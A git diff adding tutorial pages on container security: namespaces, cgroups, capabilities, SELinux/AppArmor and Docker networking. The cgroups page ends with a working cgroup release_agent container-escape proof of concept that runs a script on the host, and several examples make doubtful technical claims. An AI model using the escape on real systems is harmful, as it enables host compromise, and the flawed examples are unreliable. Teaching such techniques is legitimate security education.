container bundles all dependencies, you can take your application just about anywhere without rebuilding it to account for a new environment. + + Also, the abstraction provided by containerization ensures that your container works the same way regardless of where you deploy it. That means you can take your app to the cloud, run it on in a VM, or go directly to bare metal. As long as the host operating system supports your containerization tools, you are ready to deploy with minimal hassle. +- Efficiency + - Containerization is one of the most efficient methods of virtualization available to developers. Containers improve efficiency in two ways: they use all available resources, and they minimize overhead. + + - When properly configured, containers allow a host to take advantage of virtually all available resources. Isolated containers can perform their operations without interfering with other containers, allowing a single host to perform many functions. + + - Containers also remove the need for virtualized operating systems, hypervisors, and other bottlenecks typically introduced by virtualization techniques. Unlike VMs, which rely on their virtual kernel, containers use the host operating system’s kernel. This drastically reduces overhead and minimizes resource use. +- Agility + - Containerization is a crucial tool for streamlining DevOps workflows. You can create containers rapidly, deploy them to any environment, where they can be used to solve many diverse DevOps challenges. + + When a task presents itself, you can quickly develop a container to handle the job. If it is no longer needed, you can automatically shut it down until it is needed again. This is a technique known as orchestration. Technologies like Kubernetes automate the process of coordinating, managing, scaling, and removing containers. + + You can think of Kubernetes as the conductor of your container orchestra. With the help of Kubernetes-coordinated containers, developers can rapidly respond to problems and spin up novel solutions without worrying about lengthy and complicated deployments. + + +- Faster delivery + - How long does it take upgrades to go from concept to implementation? 
Generally, the bigger an application, the longer it takes to get any improvements implemented. Containerization solves this issue by compartmentalizing your application. You can divide even the most enormous beast of an application into discrete parts using microservices. + + - Microservices take apart much larger applications by segmenting pieces into containers. This division makes it much easier for developers to implement changes and deploy new code. You can change isolated areas of the application without affecting the whole. +- Improved security + - The isolation introduced by containerization also provides an additional layer of security. Because containers are isolated from one another, you can be confident that your applications are running in their own self-contained environment. That means that even if the security of one container is compromised, other containers on the same host remain secure. + + - In addition to being isolated from one another, containers are also isolated from the host operating system and can only minimally interact with computing resources. All of this equates to an inherently more secure way to deploy applications. +- Faster app startup + - Compared to other methods of virtualization such as VMs, containers are extremely lightweight. One of the many benefits of being lightweight is rapid startup times. Because a container doesn’t rely on a hypervisor or virtualized operating system to access computing resources, startup times are virtually instantaneous. + + - The only limiting factor is the application itself. With no substantial overhead to wait for, the only startup delay is from your code. Rapid startup is a great reason for frequent updates and improvements. + + +- Easier management + - Containerization allows developers the versatility to operate their code in either a virtualized or bare-metal environment. Whatever the demands of deployment, containerization can rise to meet them. Should there be a sudden need to retool your environment from metal to virtual or vice versa, your containerized applications are already prepared to make the switch. + + - Containerized apps using microservices become so flexible that you can host certain elements on bare metal and deploy others to virtual cloud environments. + + - Thinking with containers allows developers to reconceptualize their available resources. That might mean squeezing an extra drop of processing from a machine at maximum capacity. Or it could mean finding that what before seemed like a resource limitation was simply an opportunity to innovate. + + +- Flexibility + - Kubernetes offers a variety of tools that simplify container management, like rollbacks and upgrades, as part of the platform. It also handles installation. There are self-healing features you can use to attempt to recover failed containers, terminate containers that fail health checks, and constantly monitor your containers’ health and status. + + - Kubernetes also automates resource management. You can allocate each container a set amount of CPU and RAM to handle its tasks. Ultimately, managing containers with the help of a tool such as Kubernetes is leaps and bounds easier than traditional application management methods. 
+ + +# Container Disadvantages + +- Not right for all tasks + - containers are ideally suited to microservice-type application development -- an approach that allows more complex applications to be configured from basic building blocks, where each building block is deployed in a container and the constituent containers are linked together to form the cohesive application. The application's functionality can then be scaled by deploying more containers of the appropriate building blocks rather than entire new iterations of the full application. +- Grappling with dependencies + - Common VMs are extremely self-contained and each VM includes a unique operating system (OS), drivers and application components. VMs can also be migrated to any other system as long as a suitable hypervisor is available. By comparison, containers run on top of a physical OS, sharing much of the underlying OS kernel along with many libraries and binaries. Bittman explained that placing dependencies on containers that can limit portability between servers. For example, Linux containers under Docker cannot run on current versions of Windows Server. +- Weaker isolation + - Hypervisor-based VMs provide a high level of isolation from one another because the system's hardware resources are all virtualized and presented to the VMs through the hypervisor. This means a bug, virus or intrusion could compromise one VM, but not carry over to other VMs. + + - Containers are weaker because they share an OS kernel and components and already have a deep level of authorization (usually root access in Linux environments) in order to run in the first place. As a consequence, flaws and attacks have a much greater potential to carry down into an underlying OS and over into other containers -- potentially propagating malicious activity far beyond the original event. + + - While container platforms are evolving to segregate OS rights and limit vulnerable security postures, Bittman explains that administrators can boost security now by running containers in a VM. For example, it's possible to set up a Linux VM on Hyper-V and install Docker containers on the Linux VM. Even if containers within the VM are compromised, the vulnerability will not extend outside of the VM -- limiting the scope of potential damage. +- Potential for sprawl + - Where VM lifecycle management is important for hypervisor-based environments, lifecycle management is absolutely critical for containers. Containers can be spun up and duplicated at an astonishing rate. This is an important benefit of containers, but it's also possible to consume a vast amount of computing resources without truly realizing it. That's not bad if the application's constituent containers are spun down or deleted when they're no longer needed. But the costs to scale up a containerized application, and then forgetting to scale it back later, can impose significant (and unnecessary) cloud computing costs for the enterprise. Bittman noted that cloud providers love it -- they make money renting computing power -- and the onus is on users to watch how containers are deployed. + +- Limited tools + - The kind of tools needed to monitor and manage containers are still lacking in the industry. This is not a new phenomenon. The early days of hypervisor-based virtualization were marked by a shortage of suitable tools. And just as capable VM monitoring and management tools are now readily available, new tools are starting to appear for container management. 
These include Google's open source Docker management tools Kubernetes, DockerUI to replace Linux command line functions with a web-based front end, Logspout to route container logs to a central location and so on. + + diff --git a/content/en/containersecurity/b4.Namespaces 2.md b/content/en/containersecurity/b4.Namespaces 2.md new file mode 100644 index 0000000..ae8dc2a --- /dev/null +++ b/content/en/containersecurity/b4.Namespaces 2.md @@ -0,0 +1,162 @@ +--- +title: "Namespaces " +description: "Linux Container Namespaces " +slug: "namespaces" +--- + +# Namespaces + + +There are several types of namespaces in containers, including: + +1. PID Namespaces: + - These namespaces isolate the process IDs of containers from the host system and from other containers. This means that each container has its own set of process IDs, which helps to prevent conflicts and ensures that containers cannot access processes belonging to other containers or the host system. + +2. Network Namespaces: + - These namespaces isolate the network interfaces and IP addresses of containers from the host system and from other containers. This allows each container to have its own virtual network interface and IP address, enabling them to communicate with each other and with the host system. +3. Mount Namespaces: + - These namespaces isolate the file systems of containers from the host system and from other containers. This allows each container to have its own file system, which is separate from the file systems of other containers and the host system. +4. User Namespaces: + - These namespaces isolate the user IDs of containers from the host system and from other containers. This allows containers to run as a different user or group than the host system, which helps to prevent privilege escalation and ensures that containers cannot access resources belonging to other containers or the host system. +5. UTS Namespaces: + - These namespaces isolate the hostname and domain name of containers from the host system and from other containers. This allows each container to have its own hostname and domain name, which can be used to identify the container within a network. + +
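Before looking at each namespace type in turn, it helps to see that these namespaces already exist on any Linux host running containers. A quick inspection sketch, assuming the util-linux `lsns` tool is available (`<container>` and `<pid>` are placeholders you would fill in yourself):

```bash
# List the namespaces visible to the current user (type, inode, owning PID).
lsns

# Show only network namespaces.
lsns -t net

# Inspect the namespaces of one process, e.g. a container's main process
# (look up the PID with: docker inspect --format '{{.State.Pid}}' <container>).
ls -l /proc/<pid>/ns
```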
+ +# PID Namespaces with example + +- PID namespaces are a Linux kernel feature that allow processes to have their own unique process identifier (PID) space, separate from the global PID space. This allows for the creation of multiple, isolated process hierarchies within a single host. + +- For example, consider a scenario where you want to run multiple instances of a web server on a single host, each with its own set of processes. Without PID namespaces, you would have to manually manage the PIDs of each instance to ensure that there are no conflicts between them. + +- With PID namespaces, you can simply create a new namespace for each instance of the web server, and the processes within each namespace will have their own unique PIDs, separate from the other instances. This makes it much easier to manage and isolate the processes of each instance. + +To create a new PID namespace, you can use the "unshare" command with the `--pid` flag (adding `--fork` so that the new shell itself is started inside the namespace). For example: + +```bash +$ sudo unshare --pid --fork bash +``` +This will create a new bash shell within a new PID namespace, and any processes that you start within this shell will have their own unique PIDs within that namespace. Note that `ps` reads `/proc`, which at this point still belongs to the host, so to actually observe the new PID numbering you also need to remount `/proc`, as shown in the sketch below.
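A minimal verification sketch, assuming root privileges and util-linux's `unshare`: the `--mount-proc` option remounts `/proc` inside the new namespaces, so process-listing tools only see the isolated PID space:

```bash
# Start a shell in new PID and mount namespaces; --fork makes bash a child of
# unshare so it becomes PID 1, and --mount-proc gives it a private /proc.
sudo unshare --pid --fork --mount-proc bash

# Inside the new shell, only the shell and ps itself are visible:
ps aux

# The shell sees itself as PID 1, even though the host assigns it another PID.
echo $$
```

Exiting the shell ends the last process in the namespace, which tears it down again.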
+ +# Network Namespaces with example + + +Namespaces are a way for containers to share a single kernel while still having their own set of resources and processes. This allows multiple containers to run on a single host without conflicting with each other. + +For example, if we have two containers running on a host, each with their own namespace for network resources, they will be able to use the same network interface, but will not be able to see or interact with each other's network connections. + +To demonstrate this, we can use the following commands: + +First, create a namespace for network resources using the "ip netns" command: + +```bash +# ip netns add container1 +``` +Now, create a veth pair (virtual Ethernet pair) to connect the namespace to the host: + +```bash +# ip link add veth0 type veth peer name veth1 + +``` +Assign veth1 to the namespace: + +```bash +# ip link set veth1 netns container1 + +``` +Bring up the veth pair: + +```bash +# ip link set veth0 up +# ip netns exec container1 ip link set veth1 up + +``` +Now, assign an IP address to veth0: + +```bash +# ip addr add 192.168.0.1/24 dev veth0 + +``` +And assign an IP address to veth1 in the namespace: + +```bash +# ip netns exec container1 ip addr add 192.168.0.2/24 dev veth1 + +``` +Now, we can test connectivity between the host and the namespace by pinging the IP address assigned to veth1: + +```bash +# ping 192.168.0.2 + +``` +In this example, we created a namespace for network resources and connected it to the host using a veth pair. We were then able to assign IP addresses to each end of the pair and ping the IP address in the namespace from the host, demonstrating that the namespace is isolated from the host's network resources.
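To make the isolation itself visible, you can compare what the namespace and the host see, and then clean up; a small follow-on sketch using the names from the example above:

```bash
# Inside the namespace only the loopback device and veth1 exist;
# none of the host's other interfaces are visible.
ip netns exec container1 ip addr

# From inside the namespace, the host end of the veth pair is reachable.
ip netns exec container1 ping -c 3 192.168.0.1

# The host still manages veth0 alongside its normal interfaces.
ip addr show veth0

# Clean up: removing the namespace also destroys the veth pair.
ip netns delete container1
```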
+ +# Mount Namespaces with example + +Mount namespaces in containers allow for the creation of isolated environments for file systems. This means that each container has its own unique file system, separate from the host operating system and other containers. + +For example, let's say we have a container running a web server. Within this container, we have the necessary files and directories for the web server to run, such as HTML files and images. + +Now, let's say we want to run a second container that also has a web server, but with different HTML files and images. If we didn't have mount namespaces, both containers would be sharing the same file system and could potentially overwrite or interfere with each other's files. + +However, with mount namespaces, each container has its own isolated file system. This allows us to run both web servers with different files and directories, without them affecting each other. + +Every container already gets its own mount namespace; to add a host directory into that namespace, we can use the `--mount` flag when running the container. For example: + +```bash +$ docker run -d --name mycontainer --mount type=bind,source=/path/to/files,target=/var/www/html nginx +``` + +This command creates a new container named "mycontainer" and mounts the directory at `/path/to/files` from the host operating system to the `/var/www/html` directory within the container. This allows the web server within the container to access and serve the files from the host operating system. + +# User Namespaces with example + +User Namespaces in containers allow the container to have its own independent user and group IDs, separate from the host system. This can be useful for providing isolation and security within the container, as well as allowing the container to run processes with different user and group permissions than the host system. + +For example, let's say we have a container running as the user `appuser` with a user ID of 1000 and a group ID of 1000. Without User Namespaces, this user would have the same permissions as the user `appuser` on the host system. However, with User Namespaces enabled, we can map the user and group IDs within the container to different IDs on the host system. For example, we could map the user ID 1000 within the container to the user ID 2000 on the host system. This would allow the container to run processes as user 2000 on the host system, while still appearing as user 1000 within the container. + + +User-namespace remapping is enabled through the `userns-remap` setting in the Docker daemon configuration; once it is enabled, containers start in their own user namespace by default. The `--userns` flag then controls this per container. For example: + +```bash +docker run --userns=host -it ubuntu + +``` + +This starts a new Ubuntu container that opts out of remapping and runs in the host's user namespace, so its user and group IDs map directly to the host's. + + +# UTS Namespaces with example + +UTS namespaces allow containers to have their own hostname and domain name, separate from the host machine. This means that each container can have its own hostname and domain name, without affecting the host machine or other containers. + +To demonstrate this with a hands-on example, we can create a container using Docker and specify a hostname for the container. + +First, let's create a container using the following command: + +``` +docker run -it --name my_container ubuntu + +``` + +This will create a container named `my_container` using the Ubuntu image.
Now, let's specify a hostname for this container using the `-h` flag: + +```bash +docker run -it --name my_container -h my_container_host ubuntu + +``` +Now, if we check the hostname of the container using the `hostname` command, it will return `my_container_host`. This hostname is specific to the container and is not the same as the host machine's hostname. + +We can also specify a domain name for the container using the `--domainname` flag (use a different `--name`, or remove the previous container first, because container names must be unique): + +```bash +docker run -it --name my_container2 -h my_container_host --domainname my_container_domain ubuntu +``` +Now, if we check the domain name of the container by reading `/proc/sys/kernel/domainname`, it will return `my_container_domain`. This domain name is specific to the container and is not the same as the host machine's domain name. + +By using UTS namespaces, we can give each container its own unique hostname and domain name, allowing them to be isolated and operate independently from the host machine and other containers. \ No newline at end of file diff --git a/content/en/containersecurity/b5.Cgroup 2.md b/content/en/containersecurity/b5.Cgroup 2.md new file mode 100644 index 0000000..e89b78b --- /dev/null +++ b/content/en/containersecurity/b5.Cgroup 2.md @@ -0,0 +1,233 @@ +--- +title: "Cgroups" +description: "Linux Container Cgroups " +slug: "Cgroups" +--- + +# Cgroups
+Cgroups, also known as control groups, are a Linux kernel feature that allows administrators to limit, prioritize, and allocate resources such as CPU, memory, and I/O bandwidth to a group of processes. + +In a container environment, Cgroups are used to ensure that each container has its own set of resources and cannot interfere with other containers or the host system. This helps to isolate the containers from each other and allows them to run in a more predictable and stable manner. + +Cgroups can be used to set limits on the amount of resources a container can use, such as CPU time or memory usage. This ensures that a single container cannot monopolize resources and negatively impact the performance of other containers or the host system. + +Cgroups are a key component in containerization technologies such as Docker and Kubernetes, which use them to manage and allocate resources for containers. They help to ensure that containers have the resources they need to run effectively, while also preventing resource contention between containers. + + +There are several types of cgroups (control groups) that can be used in a container: + +1. CPU: This cgroup limits the amount of CPU resources available to a container. It can be used to ensure that a container does not consume too much CPU time, which can impact the performance of other containers or the host machine. + +2. Memory: This cgroup limits the amount of memory available to a container. It can be used to prevent a container from consuming too much memory, which can cause the host machine to run out of available memory. +3. Disk I/O: This cgroup limits the amount of disk I/O (input/output) available to a container. It can be used to ensure that a container does not consume too much disk I/O, which can impact the performance of other containers or the host machine. +4. Network: This cgroup limits the amount of network bandwidth available to a container. It can be used to ensure that a container does not consume too much network bandwidth, which can impact the performance of other containers or the host machine. +5. PID: This cgroup limits the number of processes that a container can run. It can be used to prevent a container from creating too many processes, which can impact the performance of other containers or the host machine. + + +# CPU Cgroup with example
+A CPU Cgroup (Control Group) is a Linux kernel feature that allows the administrator to limit, prioritize, and allocate CPU resources to specific groups of processes or containers. This helps to ensure that a single container or group of processes does not consume too much CPU resources and cause resource contention with other containers or processes on the system. + +To illustrate this with a hands-on example, let's say we have two containers running on our system: Container A and Container B. We want to allocate 50% of the CPU resources to Container A and the remaining 50% to Container B. + +To do this, we can use the "cgcreate" command to create a new CPU Cgroup for Container A: + +```bash +$ cgcreate -g cpu:/container_a + +``` +Next, we can use the "cgset" command to specify the CPU resources that Container A is allowed to use: + +```bash +$ cgset -r cpu.cfs_quota_us=50000 container_a + +``` + +This sets the CPU quota for Container A to 50,000 microseconds (50% of the available CPU resources). + +Finally, we can use the "cgclassify" command to assign the processes running in Container A to this Cgroup: + +```bash +$ cgclassify -g cpu:/container_a $(pidof ) + +``` + +This will ensure that the processes running in Container A are only allowed to use up to 50% of the CPU resources. + +We can repeat this process for Container B to allocate the remaining 50% of CPU resources to it. + +By using CPU Cgroups, we can effectively control and allocate CPU resources to different containers and processes on our system, ensuring that each container or process gets the resources it needs without causing resource contention. + + +# Memory Cgroup with example +
+ +Memory Cgroups (control groups) are a Linux kernel feature that allow administrators to allocate and limit the amount of memory resources available to a group of processes. This is particularly useful in the context of containers, where the containerized applications are isolated from the host system and can potentially consume all available memory resources. + +For example, consider a situation where a containerized application is running on a host with 8 GB of memory. Without memory Cgroups, the application could potentially consume all 8 GB of memory, potentially causing other processes on the host to crash or experience performance issues. + +To address this issue, an administrator can use memory Cgroups to limit the amount of memory available to the containerized application. For example, the administrator could specify that the containerized application is only allowed to use 4 GB of memory. If the application attempts to consume more than 4 GB of memory, it will be killed by the kernel. + +To demonstrate this concept with a hands-on example, we can use the "docker" command to run a containerized application and specify a memory limit using the `--memory` flag. For example: + +```bash +docker run --memory 4g my_containerized_app + +``` + +This command will run the containerized application `my_containerized_app` and limit it to using a maximum of 4 GB of memory. If the application attempts to consume more than 4 GB of memory, it will be killed by the kernel. + +# Disk I/O Cgroup with example +
+A Disk I/O Cgroup is a Linux kernel feature that allows administrators to set limits on the amount of disk input/output (I/O) a group of processes can perform. This can be useful in a container environment, as it allows administrators to ensure that one container or group of containers does not consume too many resources and negatively impact the performance of other containers or the host system.
+
+To create a Disk I/O Cgroup in a container environment, you will need to have a container runtime that supports Cgroups, such as Docker or Kubernetes.
+
+Here is a hands-on example using Docker:
+
+1. Run the following command to create a new container named "my-container" with a Disk I/O Cgroup limit of 100 kilobytes per second (KB/s):
+
+```bash
+docker run -it --name my-container --cgroup-parent my-cgroup \
+--device-read-bps /dev/sda:100000 --device-write-bps /dev/sda:100000 ubuntu
+
+```
+
+Once the container is running, you can use the cgclassify command to move an additional process (identified by its PID) into the container's blkio cgroup:
+
+```bash
+cgclassify -g blkio:/my-cgroup/my-container $PID
+
+```
+You can also use the cgtop command to monitor the Disk I/O usage of the container in real-time:
+
+```bash
+cgtop -d 1 -c 2 -g blkio
+
+```
+
+This will display a list of all containers with Disk I/O Cgroups, along with their usage and limits. In this example, you should see "my-container" listed with a limit of 100 KB/s.
+
+By setting Disk I/O limits for containers, you can ensure that each container has the resources it needs to perform its tasks without impacting the performance of other containers or the host system. This can help to improve the overall performance and stability of your container environment.
+
+
+# Network Cgroup with example
+
+Network Cgroup is a Linux kernel feature that allows the administrator to limit, prioritize, and control network resources for a group of processes. In the context of containers, Network Cgroup can be used to limit the amount of bandwidth, number of connections, and other network resources that a container can use. + +For example, consider a scenario where you have a container running a web server. You may want to limit the amount of bandwidth the container can use to prevent it from consuming too much of the available network resources. To do this, you can use Network Cgroup to set a bandwidth limit for the container. + +To demonstrate this with a hands-on example, let's first create a new container using Docker: + +```bash +$ docker run -it --name web-server ubuntu +``` + +Next, we will use the `cgcreate` command to create a new Network Cgroup for our container: + +```bash +$ cgcreate -g net_cls:web-server + +``` + +This will create a new Network Cgroup named web-server that we can use to limit the network resources of our container. + +To set a bandwidth limit for our container, we can use the tc command to create a new traffic control class and attach it to our Network Cgroup: + +```bash +$ tc class add dev eth0 parent 1:1 classid 1:10 htb rate 1mbps +$ cgset -r net_cls.classid=1:10 web-server + +``` +This will limit the container to using 1Mbps of bandwidth. If the container tries to use more bandwidth than this, it will be throttled by the kernel. + +We can verify that the bandwidth limit is in place by using the tc command to show the traffic control classes: + +```bash +$ tc -s class show dev eth0 + +``` + +This will show all of the traffic control classes on the eth0 interface, including the one we just created for our container. + +In this example, we demonstrated how to use Network Cgroup to limit the bandwidth used by a container. However, Network Cgroup can also be used to control other network resources, such as the number of connections, packet rate, and more. + + +# PID Cgroup with example +
+PID stands for "Process ID" and is a unique identifier assigned to each process running on a computer. A PID allows the system to identify and manage each process individually. + +Cgroup stands for "Control Group" and is a Linux kernel feature that allows the system to allocate resources (such as CPU and memory) to a group of processes. This allows the system to prioritize or limit the resource usage of certain processes. + +In a container, PID and Cgroup are used to isolate processes and resources within the container. For example, if we have a container running a web server, we can assign a specific PID and Cgroup to that container to ensure that the web server has access to the necessary resources and is not impacted by other processes running on the system. + +Here is a hands-on example of using PID and Cgroup in a container: + +Start a new container using the docker run command, specifying the image and any necessary arguments: + +```bash +docker run -d --name my-web-server -p 8080:80 nginx + + +``` +Check the PID of the main process inside the container by running the following command: + +```bash +docker exec my-web-server ps -aux + + +``` +This will display a list of processes running inside the container, including the PID of the main process (in this case, the nginx web server). + +Check the Cgroup of the container by running the following command: + +```bash + +cat /sys/fs/cgroup/memory/docker/[CONTAINER ID]/memory.usage_in_bytes + + +``` + + +This will display the current memory usage of the container in bytes. + +By using PID and Cgroup, we can ensure that the processes and resources within the container are properly isolated and managed. + + + +# Created Group release agent (container escape). +
+MITRE: Privilege Escalation
+
+The PoC relied on another misconfiguration where the container has elevated privileges, either via the `--privileged` flag or via `--cap-add=SYS_ADMIN` combined with `--security-opt apparmor=unconfined`. The escape can be triggered by an exploit using the Linux cgroups (control groups) mechanism and a `release_agent` file.
+
+Linux control groups are intended to allow multiple Docker containers to run in isolation while limiting and monitoring their use of resources. However, the `release_agent` file contains a command that is executed by the kernel with full privileges on the host once the last task in a cgroup terminates. The PoC abuses this functionality by creating a `release_agent` file with a malicious command, and then killing off all the tasks in the cgroup.
+
+As the cgroup files are present both in the container and on the host, it is possible to modify them from either, which means an attacker can spawn a process inside the cgroup and gain code execution on the host.
+
+```bash
+# On the host
+
+docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash
+
+# In the container
+mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
+
+echo 1 > /tmp/cgrp/x/notify_on_release
+host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
+echo "$host_path/cmd" > /tmp/cgrp/release_agent
+
+echo '#!/bin/sh' > /cmd
+echo "ps aux > $host_path/output" >> /cmd
+chmod a+x /cmd
+
+sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
+
+```
+
+MITRE: Privilege Escalation
\ No newline at end of file
diff --git a/content/en/containersecurity/b6.Capabilities 2.md b/content/en/containersecurity/b6.Capabilities 2.md
new file mode 100644
index 0000000..b9851dd
--- /dev/null
+++ b/content/en/containersecurity/b6.Capabilities 2.md
@@ -0,0 +1,177 @@
+---
+title: "Capabilities "
+description: "Linux Container Capabilities "
+slug: "capabilities"
+---
+
+
+# Capabilities
+
+There are several types of capabilities that are used in Linux container security: + +1.Process isolation: This allows the separation of processes between different containers, ensuring that processes running in one container do not have access to resources or processes in another container. + +2.Resource limitation: This allows the allocation of specific resources (such as CPU, memory, and disk space) to each container, ensuring that one container does not consume more resources than it has been allocated. + +3.User namespace: This allows the creation of user accounts within a container that are separate from the host system, ensuring that users within a container do not have access to resources outside of the container. + +4.SELinux or AppArmor: These are security frameworks that allow administrators to set granular permissions for processes and resources within a container, ensuring that only authorized processes and resources can be accessed. + +5.Network isolation: This allows the creation of separate network environments for each container, ensuring that containers cannot communicate with each other or the host system unless explicitly allowed. + +Overall, these capabilities help to ensure that containers are secure and isolated from each other, protecting the host system and other containers from potential vulnerabilities or attacks. + + +# Process Isolation +
+Process isolation is a security feature that allows containers to operate as if they are running on a separate machine, even though they are sharing the same underlying operating system and hardware resources with other containers. This is achieved by isolating the processes running inside the container from those running outside, and by limiting the resources (such as CPU, memory, and network bandwidth) that a container can access. + +One way to demonstrate process isolation in a container is to create two containers, each running a different application. For example, we can create a container running a web server and another container running a database. We can then verify that the processes running inside each container are isolated from each other by trying to access the database from the web server container (which should fail). + +Here is a hands-on example of how to demonstrate process isolation in containers using Docker: + +First, install Docker on your machine if you don't already have it. +Start by creating a Docker network for our containers to communicate over. Run the following command: + +```bash +docker network create my-network +``` +Next, create a container running a web server by running the following command: + +```bash +docker run -d --name web-server --network my-network -p 80:80 nginx:latest +``` +This will create a container running the latest version of the nginx web server, and expose it on port 80 of the host machine. + +Now, create a second container running a database by running the following command: + +```bash +docker run -d --name database --network my-network -p 3306:3306 mysql:latest +``` +This will create a container running the latest version of the MySQL database, and expose it on port 3306 of the host machine. + +To verify that the two containers are isolated from each other, try to connect to the database from the web server container by running the following command: + +```bash +docker exec -it web-server mysql -h database -u root -p + +``` + +This should fail with an error message, indicating that the web server container is unable to access the database container. + +if you want to verify that the two containers are able to communicate with each other, you can connect to the web server container and use the curl command to make a request to the database container. For example: + +```bash +docker exec -it web-server bash +curl http://database:3306 + +``` +This should return the MySQL welcome message, indicating that the web server container is able to communicate with the database container. + +Overall, this example demonstrates how process isolation in containers can be used to securely separate different applications and services, even though they are running on the same machine. + + +# Resource limitation +
+Resource limitation capabilities in container security refer to the ability to set limits on the amount of resources (such as CPU, memory, and network bandwidth) that a container is allowed to use. This can be useful for preventing a container from consuming too many resources and potentially impacting the performance of other containers or the host system. + +One example of using resource limitation capabilities in a hands-on scenario is to set limits on the CPU and memory usage of a container when deploying it. This can be done using the `--cpu-shares` and `--memory` flags when running the `docker run` command. For example: + +```bash +$ docker run -d --name my-container --cpu-shares 512 --memory 512MB my-image + +``` + +This command will run a container named "my-container" using the image "my-image", and limit the container's CPU usage to 512 shares (which is a relative value based on the host system's CPU) and its memory usage to 512MB. If the container tries to use more resources than these limits, it will be restricted and may experience performance issues. + +Resource limitation capabilities can be an effective tool for improving the security and stability of a container environment, as they can prevent a single container from causing issues for other containers or the host system. However, it's important to carefully consider the resource requirements of each container and set appropriate limits to ensure that the container has sufficient resources to function properly. + + +# User namespace +
+User namespaces in container security allow for the creation of a virtualized user environment within a container. This means that the processes within the container can run with a different set of user and group IDs than the host system. This can be useful in a number of scenarios, such as: + +- Running a container with a different user or group ID than the host system, which can help to isolate the processes within the container and prevent them from accessing sensitive host resources. +- Allowing a container to run as a specific user or group ID, even if that user or group ID does not exist on the host system. This can be useful when the container needs to access certain resources that are restricted to specific users or groups. +To demonstrate a hands-on example of user namespaces in container security, we can run a container with a different user and group ID than the host system. For example, we can create a container that runs as the "foo" user and "bar" group, even if those users and groups do not exist on the host system. + +To do this, we can use the following Docker command: + +```bash +$ docker run --rm -it --user 1000:1000 --name test-container ubuntu + +``` + +This will create a new container with the name "test-container", running the Ubuntu image and using the user and group IDs of 1000. We can verify that the container is running as the correct user and group by running the id command inside the container: + +```bash +# id +uid=1000(foo) gid=1000(bar) groups=1000(bar) + +``` +As we can see, the container is now running as the "foo" user and "bar" group. This allows us to isolate the processes within the container and prevent them from accessing sensitive host resources. It also allows us to access resources that are restricted to specific users or groups within the container, even if those users or groups do not exist on the host system. + + +# SELinux or AppArmor +
+SELinux (Security Enhanced Linux) and AppArmor are two examples of mandatory access control systems that can be used to secure containers. + +SELinux is a Linux kernel security module that allows administrators to define fine-grained access control policies for users, processes, and files. These policies are enforced at the kernel level, making it difficult for malicious actors to bypass or manipulate them. + +To demonstrate SELinux in action, we can create a simple container and apply an SELinux context to it. For example, let's create a container using the following command: + +```bash +$ docker run -it ubuntu bash + +``` +Next, we can apply an SELinux context to the container by using the chcon command: + +```bash +$ chcon -t container_t /var/lib/docker/overlay2/ + +``` + +This sets the SELinux context for the container to "container_t", which is a type of SELinux policy that is designed specifically for containers. This policy allows the container to access certain resources, such as networking and file system resources, but restricts its access to other resources, such as system processes and system files. +
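+On an SELinux-enabled host (for example Fedora or RHEL with the container-selinux policy installed), a quick way to see this confinement in practice is to check that SELinux is enforcing and then look at the label assigned to a container's processes. This is only a sketch; the container name `selinux-demo` is a hypothetical example:
+
+```bash
+# Confirm SELinux is in enforcing mode on the host
+getenforce
+
+# Start a test container
+docker run -d --name selinux-demo nginx
+
+# The container's processes should be running in the container_t domain
+ps -eZ | grep container_t
+```
+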
+AppArmor is another mandatory access control system that can be used to secure containers. It works by defining profiles for applications, which specify what resources and actions the application is allowed to access and perform. These profiles are enforced at the kernel level, making it difficult for malicious actors to bypass or manipulate them. +
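+On hosts where AppArmor is enabled, you can list the profiles that are currently loaded and explicitly request Docker's default profile for a container. A quick check, assuming the AppArmor userspace tools are installed:
+
+```bash
+# Show loaded AppArmor profiles and their enforcement modes
+sudo aa-status
+
+# Run a container with Docker's default AppArmor profile applied explicitly
+docker run --rm -it --security-opt apparmor=docker-default ubuntu bash
+```
+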
+To demonstrate AppArmor in action, we can create a container and apply an AppArmor profile to it. For example, let's create a container using the following command: + +```bash +$ docker run -it ubuntu bash + +``` +Next, we can apply an AppArmor profile to the container by using the aa-enforce command: + +```bash +$ aa-enforce /etc/apparmor.d/container_profile + +``` +This sets the AppArmor profile for the container to "container_profile", which is a predefined profile that is designed specifically for containers. This profile allows the container to access certain resources, such as networking and file system resources, but restricts its access to other resources, such as system processes and system files. + + +# Network isolation +
+Network isolation capabilities in container security refer to the ability to restrict the network traffic between containers and between containers and the host system. This is important for maintaining the security and isolation of containers, as it ensures that containers cannot communicate with each other or the host system unless explicitly allowed. +
+One example of a hands-on approach to implementing network isolation in container security is through the use of Docker networks. Docker networks allow users to create virtual networks within their Docker environment, allowing them to specify which containers can communicate with each other and which cannot. +
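+Before creating a dedicated network, it can be useful to see the networks Docker already provides out of the box (typically `bridge`, `host`, and `none`):
+
+```bash
+# List the networks known to the Docker daemon
+docker network ls
+```
+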
+For example, let's say we have two containers running on a Docker host, Container A and Container B. By default, these two containers can communicate with each other and the host system. However, we can use Docker networks to isolate these two containers from each other and the host system. +
+To do this, we can create a Docker network and specify which containers can connect to it. For example, we could create a network called "isolated" and only allow Container A to connect to it. This would mean that Container B and the host system would not be able to communicate with Container A. + +To create a Docker network and specify which containers can connect to it, we can use the following command: + +```bash +docker network create --driver bridge isolated + +``` +To add Container A to this network, we can use the following command: + +```bash +docker network connect isolated ContainerA + +``` +This would effectively isolate Container A from Container B and the host system, as they would not be able to communicate with it through the network. +
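+To confirm the isolation, you can inspect the network to see which containers are attached, and check that a container which is not attached cannot reach Container A. A sketch, reusing the hypothetical container names from above:
+
+```bash
+# Only ContainerA should appear in the "Containers" section of the output
+docker network inspect isolated
+
+# From ContainerB (not attached to "isolated"), reaching ContainerA by name should fail
+docker exec ContainerB ping -c 3 ContainerA
+```
+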
